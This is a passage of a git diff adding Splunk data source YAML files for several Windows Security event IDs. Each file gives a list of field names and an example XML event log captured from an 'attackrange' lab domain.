+- Opcode
+- PasswordLastSet
+- PrimaryGroupId
+- PrivilegeList
+- ProcessID
+- ProfilePath
+- RecordNumber
+- SamAccountName
+- ScriptPath
+- SidHistory
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- UserAccountControl
+- UserParameters
+- UserPrincipalName
+- UserWorkstations
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object
+- object_attrs
+- object_category
+- object_id
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- src_user_name
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_name
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4738</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2022-11-17T03:25:57.674067800Z'/><EventRecordID>6389713</EventRecordID><Correlation/><Execution
+  ProcessID='640' ThreadID='1800'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='Dummy'>-</Data><Data Name='TargetUserName'>unpriv</Data><Data Name='TargetDomainName'>ATTACKRANGE</Data><Data
+  Name='TargetSid'>S-1-5-21-945660386-2529346225-2932127451-1112</Data><Data Name='SubjectUserSid'>S-1-5-21-945660386-2529346225-2932127451-500</Data><Data
+  Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data
+  Name='SubjectLogonId'>0x54bb3a</Data><Data Name='PrivilegeList'>-</Data><Data Name='SamAccountName'>-</Data><Data
+  Name='DisplayName'>-</Data><Data Name='UserPrincipalName'>-</Data><Data Name='HomeDirectory'>-</Data><Data
+  Name='HomePath'>-</Data><Data Name='ScriptPath'>-</Data><Data Name='ProfilePath'>-</Data><Data
+  Name='UserWorkstations'>-</Data><Data Name='PasswordLastSet'>-</Data><Data Name='AccountExpires'>-</Data><Data
+  Name='PrimaryGroupId'>-</Data><Data Name='AllowedToDelegateTo'>-</Data><Data Name='OldUacValue'>-</Data><Data
+  Name='NewUacValue'>-</Data><Data Name='UserAccountControl'>-</Data><Data Name='UserParameters'>-</Data><Data
+  Name='SidHistory'>
diff --git a/data_sources/windows_event_log_security_4739.yml b/data_sources/windows_event_log_security_4739.yml
new file mode 100644
index 0000000000..ede3cf72fd
--- /dev/null
+++ b/data_sources/windows_event_log_security_4739.yml
@@ -0,0 +1,118 @@
+name: Windows Event Log Security 4739
+id: c1e0442a-8a97-405d-baf2-057c5d68cd9a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4739
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- DomainBehaviorVersion
+- DomainName
+- DomainPolicyChanged
+- DomainSid
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- ForceLogoff
+- Guid
+- Keywords
+- Level
+- LockoutDuration
+- LockoutObservationWindow
+- LockoutThreshold
+- Logon_ID
+- MachineAccountQuota
+- MaxPasswordAge
+- MinPasswordAge
+- MinPasswordLength
+- MixedDomainMode
+- Name
+- OemInformation
+- Opcode
+- PasswordHistoryLength
+- PasswordProperties
+- PrivilegeList
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object_attrs
+- object_category
+- product
+- punct
+- result
+- session_id
+- severity
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4739</EventID><Version>0</Version><Level>0</Level><Task>13569</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2024-02-02T00:37:16.161168500Z'/><EventRecordID>394176</EventRecordID><Correlation/><Execution
+  ProcessID='600' ThreadID='3780'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='DomainPolicyChanged'>Lockout Policy</Data><Data Name='DomainName'>ATTACKRANGE</Data><Data
+  Name='DomainSid'>ATTACKRANGE\</Data><Data Name='SubjectUserSid'>NT AUTHORITY\SYSTEM</Data><Data
+  Name='SubjectUserName'>AR-WIN-DC$</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data
+  Name='SubjectLogonId'>0x3e7</Data><Data Name='PrivilegeList'>-</Data><Data Name='MinPasswordAge'>-</Data><Data
+  Name='MaxPasswordAge'>-</Data><Data Name='ForceLogoff'>-</Data><Data Name='LockoutThreshold'>1</Data><Data
+  Name='LockoutObservationWindow'>-</Data><Data Name='LockoutDuration'>-</Data><Data
+  Name='PasswordProperties'>-</Data><Data Name='MinPasswordLength'>-</Data><Data Name='PasswordHistoryLength'>-</Data><Data
+  Name='MachineAccountQuota'>-</Data><Data Name='MixedDomainMode'>-</Data><Data Name='DomainBehaviorVersion'>-</Data><Data
+  Name='OemInformation'>-</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4741.yml b/data_sources/windows_event_log_security_4741.yml
new file mode 100644
index 0000000000..9794e770dd
--- /dev/null
+++ b/data_sources/windows_event_log_security_4741.yml
@@ -0,0 +1,129 @@
+name: Windows Event Log Security 4741
+id: ef87257f-e7d1-4856-abae-097b2cfdcdb4
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4741
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- AccountExpires
+- AllowedToDelegateTo
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- DisplayName
+- DnsHostName
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- HomeDirectory
+- HomePath
+- Keywords
+- Level
+- LogonHours
+- Logon_ID
+- Name
+- NewUacValue
+- OldUacValue
+- Opcode
+- PasswordLastSet
+- PrimaryGroupId
+- PrivilegeList
+- ProcessID
+- ProfilePath
+- RecordNumber
+- SamAccountName
+- ScriptPath
+- ServicePrincipalNames
+- SidHistory
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- UserAccountControl
+- UserParameters
+- UserPrincipalName
+- UserWorkstations
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object_attrs
+- object_category
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_type
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4741</EventID><Version>0</Version><Level>0</Level><Task>13825</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2024-04-08T18:48:04.618400500Z'/><EventRecordID>143475</EventRecordID><Correlation/><Execution
+  ProcessID='636' ThreadID='1776'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='TargetUserName'>AR-WIN-2$</Data><Data Name='TargetDomainName'>ATTACKRANGE</Data><Data
+  Name='TargetSid'>ATTACKRANGE\AR-WIN-2$</Data><Data Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data
+  Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data
+  Name='SubjectLogonId'>0xd9f04</Data><Data Name='PrivilegeList'>-</Data><Data Name='SamAccountName'>AR-WIN-2$</Data><Data
+  Name='DisplayName'>-</Data><Data Name='UserPrincipalName'>-</Data><Data Name='HomeDirectory'>-</Data><Data
+  Name='HomePath'>-</Data><Data Name='ScriptPath'>-</Data><Data Name='ProfilePath'>-</Data><Data
+  Name='UserWorkstations'>-</Data><Data Name='PasswordLastSet'>4/8/2024 6:48:04 PM</Data><Data
+  Name='AccountExpires'>%%1794</Data><Data Name='PrimaryGroupId'>515</Data><Data Name='AllowedToDelegateTo'>-</Data><Data
+  Name='OldUacValue'>0x0</Data><Data Name='NewUacValue'>0x80</Data><Data Name='UserAccountControl'>
diff --git a/data_sources/windows_event_log_security_4742.yml b/data_sources/windows_event_log_security_4742.yml
new file mode 100644
index 0000000000..5f6027fe5a
--- /dev/null
+++ b/data_sources/windows_event_log_security_4742.yml
@@ -0,0 +1,131 @@
+name: Windows Event Log Security 4742
+id: ea830adf-5450-489a-bcdc-fb8d2cbe674c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4742
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- AccountExpires
+- AllowedToDelegateTo
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- ComputerAccountChange
+- DisplayName
+- DnsHostName
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- HomeDirectory
+- HomePath
+- Keywords
+- Level
+- LogonHours
+- Logon_ID
+- Name
+- NewUacValue
+- OldUacValue
+- Opcode
+- PasswordLastSet
+- PrimaryGroupId
+- PrivilegeList
+- ProcessID
+- ProfilePath
+- RecordNumber
+- SamAccountName
+- ScriptPath
+- ServicePrincipalNames
+- SidHistory
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- UserAccountControl
+- UserParameters
+- UserPrincipalName
+- UserWorkstations
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object_attrs
+- object_category
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_type
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4742</EventID><Version>0</Version><Level>0</Level><Task>13825</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2022-08-04T09:26:26.793335600Z'/><EventRecordID>901860</EventRecordID><Correlation/><Execution
+  ProcessID='636' ThreadID='2340'/><Channel>Security</Channel><Computer>win-dc-root-04195-428.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='ComputerAccountChange'>-</Data><Data Name='TargetUserName'>WIN-HOST-ROOT-0$</Data><Data
+  Name='TargetDomainName'>ATTACKRANGE</Data><Data Name='TargetSid'>S-1-5-21-199921393-3534762603-6736986-1111</Data><Data
+  Name='SubjectUserSid'>S-1-5-21-199921393-3534762603-6736986-500</Data><Data Name='SubjectUserName'>Administrator</Data><Data
+  Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x177304</Data><Data
+  Name='PrivilegeList'>-</Data><Data Name='SamAccountName'>-</Data><Data Name='DisplayName'>-</Data><Data
+  Name='UserPrincipalName'>-</Data><Data Name='HomeDirectory'>-</Data><Data Name='HomePath'>-</Data><Data
+  Name='ScriptPath'>-</Data><Data Name='ProfilePath'>-</Data><Data Name='UserWorkstations'>-</Data><Data
+  Name='PasswordLastSet'>-</Data><Data Name='AccountExpires'>-</Data><Data Name='PrimaryGroupId'>-</Data><Data
+  Name='AllowedToDelegateTo'>-</Data><Data Name='OldUacValue'>-</Data><Data Name='NewUacValue'>-</Data><Data
+  Name='UserAccountControl'>-</Data><Data Name='UserParameters'>-</Data><Data Name='SidHistory'>
diff --git a/data_sources/windows_event_log_security_4768.yml b/data_sources/windows_event_log_security_4768.yml
new file mode 100644
index 0000000000..400aa553d4
--- /dev/null
+++ b/data_sources/windows_event_log_security_4768.yml
@@ -0,0 +1,107 @@
+name: Windows Event Log Security 4768
+id: 4a5fd6ed-66bd-4f34-bc74-51c00c73c298
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4768
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- IpAddress
+- IpPort
+- Keywords
+- Level
+- Name
+- Opcode
+- PreAuthType
+- ProcessID
+- RecordNumber
+- ServiceName
+- ServiceSid
+- Source_Port
+- Source_Workstation
+- Status
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- TicketEncryptionType
+- TicketOptions
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- service
+- service_id
+- service_name
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_nt_host
+- src_port
+- status
+- subject
+- ta_windows_action
+- ta_windows_status
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4768</EventID><Version>0</Version><Level>0</Level><Task>14339</Task><Opcode>0</Opcode><Keywords>0x8010000000000000</Keywords><TimeCreated
+  SystemTime='2022-09-08T18:16:25.601071000Z'/><EventRecordID>391562</EventRecordID><Correlation/><Execution
+  ProcessID='644' ThreadID='3500'/><Channel>Security</Channel><Computer>win-dc-mvelazco-02713-392.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='TargetUserName'>RXETPKZH</Data><Data Name='TargetDomainName'>attackrange.local</Data><Data
+  Name='TargetSid'>NULL SID</Data><Data Name='ServiceName'>krbtgt/attackrange.local</Data><Data
+  Name='ServiceSid'>NULL SID</Data><Data Name='TicketOptions'>0x40810010</Data><Data
+  Name='Status'>0x12</Data><Data Name='TicketEncryptionType'>0xffffffff</Data><Data
+  Name='PreAuthType'>-</Data><Data Name='IpAddress'>::ffff:10.0.1.15</Data><Data Name='IpPort'>64568</Data><Data
+  Name='CertIssuerName'></Data><Data Name='CertSerialNumber'></Data><Data Name='CertThumbprint'></Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4769.yml b/data_sources/windows_event_log_security_4769.yml
new file mode 100644
index 0000000000..353f71515d
--- /dev/null
+++ b/data_sources/windows_event_log_security_4769.yml
@@ -0,0 +1,106 @@
+name: Windows Event Log Security 4769
+id: 358d5520-f40b-4fa2-b799-966c030cb731
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4769
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- IpAddress
+- IpPort
+- Keywords
+- Level
+- LogonGuid
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- ServiceName
+- ServiceSid
+- Source_Port
+- Source_Workstation
+- Status
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- TicketEncryptionType
+- TicketOptions
+- TransmittedServices
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- service
+- service_id
+- service_name
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_nt_host
+- src_port
+- status
+- subject
+- ta_windows_action
+- ta_windows_status
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4769</EventID><Version>0</Version><Level>0</Level><Task>14337</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2024-04-09T01:00:49.143003800Z'/><EventRecordID>148521</EventRecordID><Correlation/><Execution
+  ProcessID='636' ThreadID='1776'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='TargetUserName'>AR-WIN-2$@ATTACKRANGE.LOCAL</Data><Data Name='TargetDomainName'>ATTACKRANGE.LOCAL</Data><Data
+  Name='ServiceName'>AR-WIN-2$</Data><Data Name='ServiceSid'>ATTACKRANGE\AR-WIN-2$</Data><Data
+  Name='TicketOptions'>0x40810000</Data><Data Name='TicketEncryptionType'>0x17</Data><Data
+  Name='IpAddress'>::ffff:10.0.1.15</Data><Data Name='IpPort'>59191</Data><Data Name='Status'>0x0</Data><Data
+  Name='LogonGuid'>{3b4ad75b-7184-6094-b975-ea3f91932ee0}</Data><Data Name='TransmittedServices'>-</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4771.yml b/data_sources/windows_event_log_security_4771.yml
new file mode 100644
index 0000000000..1b622c319e
--- /dev/null
+++ b/data_sources/windows_event_log_security_4771.yml
@@ -0,0 +1,100 @@
+name: Windows Event Log Security 4771
+id: 418debbb-adf3-48ec-9efd-59d45f8861e5
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4771
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- IpAddress
+- IpPort
+- Keywords
+- Level
+- Name
+- Opcode
+- PreAuthType
+- ProcessID
+- RecordNumber
+- ServiceName
+- Source_Port
+- Source_Workstation
+- Status
+- SystemTime
+- System_Props_Xml
+- TargetSid
+- TargetUserName
+- Target_User_Name
+- Task
+- ThreadID
+- TicketOptions
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- service
+- service_name
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_nt_host
+- src_port
+- status
+- subject
+- ta_windows_action
+- ta_windows_status
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4771</EventID><Version>0</Version><Level>0</Level><Task>14339</Task><Opcode>0</Opcode><Keywords>0x8010000000000000</Keywords><TimeCreated
+  SystemTime='2022-09-08T17:44:20.554179400Z'/><EventRecordID>391511</EventRecordID><Correlation/><Execution
+  ProcessID='644' ThreadID='3500'/><Channel>Security</Channel><Computer>win-dc-mvelazco-02713-392.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='TargetUserName'>ALLISON_WATERS</Data><Data Name='TargetSid'>ATTACKRANGE\ALLISON_WATERS</Data><Data
+  Name='ServiceName'>krbtgt/attackrange.local</Data><Data Name='TicketOptions'>0x40810010</Data><Data
+  Name='Status'>0x18</Data><Data Name='PreAuthType'>2</Data><Data Name='IpAddress'>::ffff:10.0.1.15</Data><Data
+  Name='IpPort'>64134</Data><Data Name='CertIssuerName'></Data><Data Name='CertSerialNumber'></Data><Data
+  Name='CertThumbprint'></Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4776.yml b/data_sources/windows_event_log_security_4776.yml
new file mode 100644
index 0000000000..355bc68f64
--- /dev/null
+++ b/data_sources/windows_event_log_security_4776.yml
@@ -0,0 +1,88 @@
+name: Windows Event Log Security 4776
+id: 1da9092a-c795-4a26-ace8-d43855524e96
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4776
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- PackageName
+- ProcessID
+- RecordNumber
+- Source_Workstation
+- Status
+- SystemTime
+- System_Props_Xml
+- TargetUserName
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- Workstation
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_nt_host
+- status
+- subject
+- ta_windows_action
+- ta_windows_status
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4776</EventID><Version>0</Version><Level>0</Level><Task>14336</Task><Opcode>0</Opcode><Keywords>0x8010000000000000</Keywords><TimeCreated
+  SystemTime='2022-09-08T19:03:50.057600300Z'/><EventRecordID>391615</EventRecordID><Correlation/><Execution
+  ProcessID='644' ThreadID='6100'/><Channel>Security</Channel><Computer>win-dc-mvelazco-02713-392.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='PackageName'>MICROSOFT_AUTHENTICATION_PACKAGE_V1_0</Data><Data Name='TargetUserName'>KSYLEFUA</Data><Data
+  Name='Workstation'>WIN-HOST-MVELAZ</Data><Data Name='Status'>0xc0000064</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4781.yml b/data_sources/windows_event_log_security_4781.yml
new file mode 100644
index 0000000000..0ea1b71cf7
--- /dev/null
+++ b/data_sources/windows_event_log_security_4781.yml
@@ -0,0 +1,109 @@
+name: Windows Event Log Security 4781
+id: 9732ffe7-ebce-4557-865c-1725a0f633cb
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4781
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- NewTargetUserName
+- OldTargetUserName
+- Opcode
+- PrivilegeList
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- Target_Domain
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object
+- object_attrs
+- object_category
+- object_id
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- src_user_name
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_name
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>4781</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2024-04-09T22:22:45.521723900Z'/><EventRecordID>148763</EventRecordID><Correlation
+  ActivityID='{b05ffbda-8ac8-0003-e6fb-5fb0c88ada01}'/><Execution ProcessID='620'
+  ThreadID='3936'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='OldTargetUserName'>AR-WIN-2$</Data><Data Name='NewTargetUserName'>Administrator</Data><Data
+  Name='TargetDomainName'>ATTACKRANGE</Data><Data Name='TargetSid'>ATTACKRANGE\AR-WIN-2$</Data><Data
+  Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data
+  Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x141a04</Data><Data
+  Name='PrivilegeList'>-</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4794.yml b/data_sources/windows_event_log_security_4794.yml
new file mode 100644
index 0000000000..d640de4776
--- /dev/null
+++ b/data_sources/windows_event_log_security_4794.yml
@@ -0,0 +1,98 @@
+name: Windows Event Log Security 4794
+id: ec7da74f-274a-4bde-aa0e-15c68aca0426
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4794
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
